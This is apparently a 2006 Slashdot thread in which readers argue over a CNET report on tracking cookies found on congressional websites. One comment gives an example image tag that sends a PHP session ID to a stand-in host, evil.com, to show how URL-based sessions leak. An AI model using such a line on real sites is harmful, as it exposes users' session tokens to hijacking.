More Cookie Investigations 201
FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035. " Follow up to a story we reported on earlier.
Obviously... (Score:4, Funny)
Re:Obviously... (Score:3, Informative)
Re:Obviously... (Score:2)
Screw cookies, do something about spam.
If ISPs and States actually understood they can sue the spammers on their own turf. The spammers might start generating Frequent File Modules, but they're going to find themselves hip-deep pretty fast. And if they don't pay? Refer it to a collection agency. They give a rat's posterior unless|until it's a legitimate figure. The State AG or ISPs may not have the "Sue Spammer" money, it's not hurting ayone. So anything you get is gravy. Those collection agencies
Re:Obviously... (Score:3, Funny)
Amazing (Score:4, Funny)
Re:Amazing (Score:2, Funny)
bring_site_down();
notify_senator();
send_to_lawyers(download_slashdot_article(REFERER
spoof(404);
}
Re:Amazing (Score:2)
Re:Amazing [PATCH] (Score:2)
+++ x2 2006-01-07 01:02:10.000000000 -0600
@@ -1,7 +1,7 @@
if (REFERER == "http://slashdot.org") {
- bring_site_down();
notify_senator();
send_to_lawyers(download_slashdot_article(REFERER) );
spoof(404);
+ bring_site_down();
Re:Amazing (Score:1)
I wonder.... (Score:4, Insightful)
Re:I wonder.... (Score:1, Redundant)
Re:I wonder.... (Score:1)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:3, Interesting)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2, Informative)
Re:I wonder.... (Score:2)
Since most sites make it a habit to use 4, 5, 6 or more cookies, often with more than one domain, there are two possibilities: Web designers are complete morons (hey, it could happen), or there's something going on which more
Re:I wonder.... (Score:2)
They then pull out with that key everything they want from a database, independend from the cookie size.
That leaves us with
a)web designers being complete morons, or
b)site being composed of different web applications which all have their own demands for certain cookies to be set.
For instance main site app server + some web statistics software serving one image and a cookie + some add serving software
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Wifes standing behind their husbands while the browser automatically fills in the password for fsckingteens.com. Makes pretending he visited this site by mistake a little bit harder.
Re:I wonder.... (Score:2)
These days, it's the browser that does the auto-filling, not cookies.
It's not an either/or scenario either. Some uses of cookies are purely innocuous, others really do compromise your privacy. I don't blame end-users for not being able to tell the difference.
Re:I wonder.... (Score:2)
Also, I may be mistaken here, but as I understood it modern browsers would not allow other websites to read your cookies because your domain did not place them. I am aware of cross domain cookie capabilites between co-operating domains, but your one shot cookie was protected by a "sandbox."
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Most Apache Websites have cookies. (Score:2)
Re:I wonder.... (Score:2)
I've not even seen one, and it sure can't be common.
Re:I wonder why MS and Mozilla ... (Score:2, Funny)
BTW, I have never accepted an Internet cookie in my life, and never intend to, and will quash any other technologies that I can (eg disabling Flash). Oh, and I don't mind typing in data, if I need to (actually, I never need to - sites which require my dta are crosse
Lazy sensationalist journalism (Score:5, Informative)
Also, having a go at the White House for using WebTrends to collect and analyse visitor data is nuts. When you've got a busy and important site like that, good quality analytics are vital. If they didn't have them, you'd probably find the media criticising the White House for not knowing about their visitor demographics, popular pages etc etc.
That article really just smacks of lazy journalism. Whatever next.. discovering their PC has a "Temporary Internet Files" directory?
I use FireFox (Score:1)
What's a "Temporary Internet Files" directory?
Re:I use FireFox (Score:2)
I think they are referring to
=D
I can't quite make sense of this. (Score:2)
Re:I can't quite make sense of this. (Score:3, Interesting)
The trick is that the cookie can be linked to your personal information.
The class "compromising cookie" scenario involves a cookie set by an embedded image from a different server [greenspun.com].
Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser request
Re:I can't quite make sense of this. (Score:2)
That said, most people don't read dialog boxes unless it's something non-essential like an overwrite warning, in which case they call an IT tech. I don't expect a big flashing pink box saying "YOU HAVE A COOKIE! READ THIS AND I WILL EXPLAIN MORE!!!!LOLZ!!!1!!!!111!!!" to have any effect.
Re:Lazy sensationalist journalism (Score:3, Insightful)
I agree that this isn't a significant privacy issue. However, I think the real concern is that government websites are violating their own established privacy rules. In all these cases, it was probably an honest mistake, but people really should complain loudly any time any government agency seems to cons
Cookies are not all that evil (Score:3, Informative)
Re:Cookies are not all that evil (Score:3, Funny)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
In the end it amounds to the exact same thing, a bit of information that identifies your account. Except as you pointed out in one case there is an extra manual step.
In both cases, someone who accesses your desktop account will be able to access your online account, so there's no real difference between both methods (especially since the login is plaintext).
Re:Cookies are not all that evil (Score:2)
Cookies are just cookies (Score:3, Insightful)
Re: More Cookie Investigations (Score:2, Insightful)
Secondly, whats all the fuss about? Cookies are incredibly harmless compared to everything else floating around the internets. Right?
Oh well. Damn politians. I'm sure John McCain is perfectly correct. He, personally, does not use cookies to track people. He probably doesn't.
Re: More Cookie Investigations (Score:3, Interesting)
wrong wrong wrong.
First just because there there is a lot of other things floating araound, doesn't mean things percieved as minor should be ignored.
Do you know what started the 'don't track cookies' effort withing the government? The white house was tracking people who had cookies from a marijuana advocacy site.
Re: More Cookie Investigations (Score:4, Funny)
not that I don't believe you, i'd just like to read more on it.
Re: More Cookie Investigations (Score:3, Interesting)
http://www.cnn.com/2005/TECH/internet/12/29/spy.ag ency.privacy.ap/index.html [cnn.com]
relevant quote:
"The government first issued strict rules on cookies in 2000 after disclosures that the White House drug policy office had used the technology to track computer users viewing its online anti-drug advertising. Even a year later, a congressional study found 300 cookies still on the Web sites of 23 agencies."
however it still makes my point on one way a cookie can be used for malice
Re: More Cookie Investigations (Score:2)
Re: More Cookie Investigations (Score:2)
Re: More Cookie Investigations (Score:2)
whooboy. (Score:5, Insightful)
Because, as we all know, all politicians are fully versed in technology and its myriad uses.
Re:whooboy. (Score:1, Insightful)
If he allows statements to be attributed to him then he should take the time to find out whether they're true. Of course he's culpable if they aren't. There's no difference between a website and a speech that he got some guy to write for him in that regard.
Re:whooboy. (Score:2)
When confronted by the press about his website leaving cookies on people's computers, McCain apologized profusely, and promised that milk would be provided in the future.
Nothing to see here, move along. (Score:1, Troll)
Bush assures citizens that 'we get court orders to do wiretaps'
Why are we surprised?
I doubt McCain did this on purpose, but even if he did, should we be surprised?
I remember the last thread about cookies and the NSA had a lot of people saying 'this is nothing important' and I imagine we'll get the same comments again.
Here's the previous thread set to +3 [slashdot.org]
Re:Nothing to see here, move along. (Score:3, Insightful)
One thing I'm curious about, does Sen. McCain (or anyone in his employ) run McCain.Senate.Gov or is it all together on one server with all the other Senators web sites? Basically, does he have any control over that site using cookies?
Executive Privilege (Score:3, Insightful)
"McCain assures visitors that 'I do not use 'cookies'
Bush assures citizens that 'we get court orders to do wiretaps'"
You know, this is the thing that really shorts my circuits sometimes. Here we have a president who has effectively admitted, "Yeah, so I attack foreign nations, imprison and torture anyone I want to, arbitrarily decide who's allowed to fly and who's not, spy on anyone I want to, whether the courts want me to or not." And people very earnestly debate whether this is a partisan issue, and if
Fix? (Score:3, Interesting)
Re:Fix? (Score:2)
And Firefox 1.5 has a delete things option from a menu bar.
What more could you want?
Re:Fix? (Score:2)
Comparison-shop on eBay and have to log in separately each time? No thanks!
Re:Fix? (Score:2)
WTF is up with that? Some annoying sites don't even have a rhyme or reason for opening up new windows. I can't tell you how many times on one of those poorly developed sites that I've closed the window instead of going back because they randomly open up new windows or reuse the first one. I don't care for firefox in general over Safari, but I wish Safari had the option to disallow opening up new windows.
Oh, and another trend. WTF is
Re:Fix? (Score:2)
Re:Fix? (Score:2, Informative)
Re:Fix? (Score:2)
Firefox extension (Score:2)
Re:Fix? (Score:2)
implants a cookie? (Score:2, Interesting)
For The Love Of FSM (Score:4, Informative)
Re:For The Love Of FSM (Score:2)
Stupid Question (Score:3, Insightful)
Oh, you didn't know that Flash is the new favorite means of tracking you? Hold onto your seat Tonto, you're about to get a wake up call! Flash is far more effective than any cookie ever was and no one seems to notice. Have a look at the contents of:
~/.macromedia
or
C:\Documents and Settings\User_Name\Application Data\Macromedia\
Re:Stupid Question (Score:2, Interesting)
Re:Stupid Question (Score:2)
So what? (Score:2)
Re:So what? (Score:2)
If the site doesn't use it (Score:2)
A thoroughly informative and useful article... not (Score:3, Informative)
Unique ID numbers? Cookies are (essentially) text files, that allow the web developer to write the limited amount of information they can gather on you (or more commonly anything they need to track from page to page) onto your machine so that it can be retrieved at a later date by the same web application that stored them.
The Unique ID number they are talking about is actually the Session ID allocated by the server that identifies an individual browser session. Shut down and then reopen your browser, and you'll (most likely) get a different session ID. The completely stuffed thing about the paranoia regarding cookies is that any information that the browser could determine about you (IP, the port you are using, the page you last visited in order to get the the current page) could simply be written to the servers database - irrespective of whether or not you have cookies enabled.
In the worst case, they can be used to invade privacy by correlating one person's visits to potentially thousands of different Web sites.
OMG - that'll end civilisation as we know it! Of course this assumes that some can get their hands on ALL your cookies. Perhaps with Netscape it wasn't so hard given they were all stored in a single file - but I would think (I've never tried myself but the how of it is not obvious) you would need some sort of ActiveX control or an exploit of some kind to be able to access Cookies other than those from your web site.
You're absolutely correct (Score:2)
OMG - that'll end civilisation as we know it! Of course this assumes that some can get their hands on ALL your cookies. Perhaps with Netscape it wasn't so hard given they were all stored in a single file - but I would think (I've never tried myself but the how of it is not obvious) you would need some sort of ActiveX control or an exploit of some kind to be able to ac
Re:You're absolutely correct (Score:2)
I suggest google.
A user can be exploited, and there information can be taken. Are you thinking a cookie is some sort of magic item that can be used to exploit something?
Here is a case where cookies where used to tell if you had clicked on ads about marijuana. Also the reason for the intial memo to remove cookies becasue the violate policy:
http://shns.scripps.com/shns/story [scripps.com]
Re:And while I think of it (Score:2)
It's not an "exploit." Site A includes doubleclick code on their site to show ads. Doubleclick code (a) reads cookie data for Site A's cookies on user's computer (which gets sent because the user is visiting Site A) and passes it via querystring or other method to doubleclick, and (b) registers a visit on Site A to doubleclick's database for the user identified by doubleclick's own cookie (which gets sent because the browser requests an ad on the doubleclick domain).
Get it now?
Re:You're absolutely correct (Score:2)
Re:A thoroughly informative and useful article... (Score:2)
The Unique ID number they are talking about is actually the Session ID allocated by the server that identifies an individual browser session
No, actually, 99% of the time, the cookie is there to allow for unique identification, getting around the fact that http is stateless. This could be storing a username or a user id or something else. Session IDs are also often stored in cookies, but that really is not what they're talking about here.
Re:A thoroughly informative and useful article... (Score:2)
No, like I said in my comment, it's not "one use", it's the use 99% of the time. The whole point of cookies is to supplement stateless http with stateful information. Whether that statful information is a number identifying further state info in a database or whether it is the stateful info itself doesn't matter.
I mentioned this in the first place because of your apparent misunderstanding of unique identification of cookies, here:
paranoia (Score:2, Informative)
Session strings instead (Score:5, Informative)
I wonder if the government anti-cookie rule / recommendation / whatever it is exactly, has caused some developers to avoid even session cookies by using URL strings instead. These are less secure than cookies because they end up in web logs, get bookmarked, emailed etc. Despite what another post said, I don't think cookie values generally end up in logs.
I admit to using session strings myself because a few years ago lots of people were scared into turning cookies off in their browser. That doesn't seem to be much of a problem these days. I hope this misguided publicity is not going to trigger a return of those days. Likewise for Javascript.
Re:Session strings instead (Score:3, Interesting)
Yes, that is what I was thinking. We all love PHP right? And those long unique autogenerated PHPSESSIONIDs are perfect for cross site information transfer.
<img src="http://evil.com/foo.jpg?PHPSESSIONID=xyxxyxyx y"%gt;
These are done in spam mail all the time. I'm not sure if mail programs by default still show images, but it is common for them to have images that have appended your email address in some way to verify you got the
Someone needs to tell them about HTTP Sessions (Score:3, Insightful)
As far as I have seen from experience, the vast majority of cookies in use today are merely for storing a user's session key. They just store your virtual "connected" status (with the otherwise connectionless HTTP) for the duration of your visit to the site, and expire and are discarded after a few minutes of idleness (usually 30 minutes).
Of course, it would be nice to not have session cookies at all, but it appears to the user to be the most transparent. The other main method is to have a session key in the URI. How many times have you seen "?sessionid='somedata'" or "?JSESSIONID='somedata'" appended to the end of a URL?
The other ways, such as hashing the agent's info (ip address, browser, etc) on the server and doing a lookup for every page request, or passing the data back and forth in 'type=hidden' form fields, are less reliable.
I think that if someone would tell the media this missing bit of info, the hype might fade, if only temporarily. There are too many Chicken Littles (Cassandras?) in the world for paranoia to take a permant holiday.
Re:Someone needs to tell them about HTTP Sessions (Score:2, Funny)
Heh (Score:2)
Do you think cookies are evil? (Score:2, Informative)
http://www.macromedia.com/support/documentation/e
The Ominous Strawman (Score:2)
This is getting pretty outrageous (Score:2)
You don't need cookies to track people online. IP plus browser string works fine if the number of users is small enough. In most online forums, I can (if I wanted) track forum members just by checking my server log for hits to my linked avatar. Without any setup/work required on my part, just with the host's default server settings, it tells me their ip address, the referer (which of my posts they were reading), when they viewed it,
Missing the real point? No... (Score:2)
Self Slashdoting Host (SSH) (Score:2, Funny)
Sorry, the http://mccain.senate.gov/ [senate.gov] web page you have requested is experiencing technical difficulties. The Webmaster has been alerted.
You will be automatically redirected to the http://mccain.senate.gov/ [senate.gov] Home page after 10 seconds.
I love sites that slashdot themselves. It takes the work away from actually havign to pound the refresh button
My .gov list (Score:2)
At least it's a bipartisan issue. I'd better delete them quickly or people might think I stay informed about my government. Good thing aljazeera.net doesn't set a cookie or
Internet Violates Privacy (Score:2)
GOVERNMENT SECRETLY TRACKS CITIZENS
Washington, D.C.-- A secret group of contractors, hired by the White House, have started tracking the movements of citizens in an information kiosk set up outside the Capitol building.
"This is a blatant violation of privacy," said Murtaugh King, privacy advocate and internet blogger. "What they are doing fundamentally violates the constitution."
According to a White House spokesman, the information kiosk was set up outside the capitol building as a way to giv
Re:"i did not have sex with that cookie" (Score:2)
Re:"i did not have sex with that cookie" (Score:4, Funny)
Re:Why I Distrust Cookies (Score:2)
With browser closed, go into the tree and delete cookies. Open browser, go to sites you don't mind having cookies from (this one and others you don't want to log into 10x times a day, I like most, am lazy). Close browser, go back to tree, save cookies as cookies2. After each use of the browser go to the tree and delete cookies, save cookies2 as cookies. Next time you open the browser you have the cookie file you want, for your use, not what all the site wa
Re:I can't see how anyone can blame the site... (Score:2)
Re:BS (Score:2)